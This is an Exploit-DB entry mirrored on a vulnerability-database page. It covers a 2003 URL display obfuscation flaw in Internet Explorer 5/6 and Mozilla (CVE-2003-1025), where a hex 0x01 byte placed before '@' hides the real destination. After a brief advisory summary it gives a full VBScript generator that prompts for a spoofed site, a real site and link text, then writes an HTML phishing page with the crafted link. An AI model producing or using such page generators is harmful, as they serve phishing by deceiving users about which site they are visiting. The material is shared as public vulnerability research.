Lucene search
+L

Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation (1)

🗓️ 09 Dec 2003 00:00:00Reported by Guy CrumpleyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

Weakness in browsers allows URL obfuscation, enabling attackers to spoof trusted sites.

Related
Code
ReporterTitlePublishedViews
Family
checkpoint_advisories
Check Point Advisories
Internet Explorer URL Spoofing (CVE-2003-1025)
15 Nov 200900:00
checkpoint_advisories
cve
CVE
CVE-2003-1025
6 Jan 200405:00
cve
cvelist
Cvelist
CVE-2003-1025
6 Jan 200405:00
cvelist
exploitdb
Exploit DB
Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation (2)
9 Dec 200300:00
exploitdb
exploitdb
Exploit DB
Opera Browser 6.0 6 - URI Display Obfuscation
23 Dec 200300:00
exploitdb
nvd
NVD
CVE-2003-1025
20 Jan 200405:00
nvd
openvas
OpenVAS
IE 5.01 5.5 6.0 Cumulative patch (890923)
3 Nov 200500:00
openvas
openvas
OpenVAS
Microsoft Internet Explorer 5.01, 5.5, 6.0 Cumulative Patch (890923, MS05-020)
3 Nov 200500:00
openvas
prion
Prion
Design/Logic Flaw
29 Oct 200815:31
prion
securityvulns
securityvulns
Microsoft Security Bulletin MS04-004
3 Feb 200400:00
securityvulns
Rows per page
source: https://www.securityfocus.com/bid/9182/info

A weakness has been reported in multiple browsers that may allow attackers to obfuscate the URI for a visited page. The problem is said to occur when a URI designed to pass access a specific location with a supplied username, contains a hexadecimal 1 value prior to the @ symbol.

An attacker could exploit this issue by supplying a malicious URI pointing to a page designed to mimic that of a trusted site, and tricking a victim who follows a link into believing they are actually at the trusted location.

On Error Resume Next

PromtStart = "Do you want to create a web page to exploit Internet Explorer 5.01, 5.5 and 6.0 on Windows" _
& " platforms?" & vbcrlf & "(URL Obfuscation - https://www.securityfocus.com/bid/9182)"

Ok2Run = MsgBox (PromtStart,vbyesno + vbquestion,"URL Obfuscation Web Page Creator")

If Ok2Run = vbyes Then
	Do While strFileName = ""
		strFileName = InputBox ("Enter the name of the web page file you want to create","File Name","TEST.HTML")
	Loop
	Do While strSpoofSite = ""
		strSpoofSite = InputBox ("Enter the name of the site you want users to THINK they're going to:","Spoof Site","atkins.com")
	Loop
	Do While strRealSite = ""
		strRealSite = InputBox ("Enter the name of the site users WILL go to when they click on the link:","Real Site","www.mcdonalds.com")
	Loop
	Do While strLinkText = ""
		strLinkText = InputBox ("Enter the text you want to appear in the link:","Link Text","Go to the Atkins Site")
	Loop
	Err.Clear
	CreateExploitPage strFileName, strSpoofSite, strRealSite, strLinkText
	If Err.Number = 0 then
		MsgBox "Your exploit page has been saved to C:\" & strFileName & ".",vbokonly + vbinformation, "Script Complete"
	Else
		MsgBox "An error occured (" & Err.Description & ")saving your exploit page to C:\" & strFileName & ".",vbokonly + vbcritical, "Script Error"
		Err.Clear
	End if
Else
	MsgBox "Script canceled.",vbokonly + vbcritical,"URL Obfuscation Web Page Creator"
End If

Sub CreateExploitPage(strFileName, strSpoofSite, strRealSite, strLinkText)
	Set fs = CreateObject("Scripting.FileSystemObject")
	Set a = fs.CreateTextFile("c:\" & strFileName, True)
	a.WriteLine("<HTML>")
	a.WriteLine("<TITLE>Exploit Page for BID 9182 (https://www.securityfocus.com/bid/9182)</TITLE>")
	a.WriteLine("<BODY>")
	strExploitLine = "<A HREF=" & Chr(34) & "http://" & strSpoofSite & Chr(1) & "%00@" & strRealSite
	strExploitLine = strExploitLine & Chr(34) & ">" & strLinkText & "</A>"
	a.WriteLine(strExploitLine)
	a.WriteLine("</BODY>")
	a.WriteLine("</HTML>")
	a.Close
End Sub

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Mar 2019 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.26912
37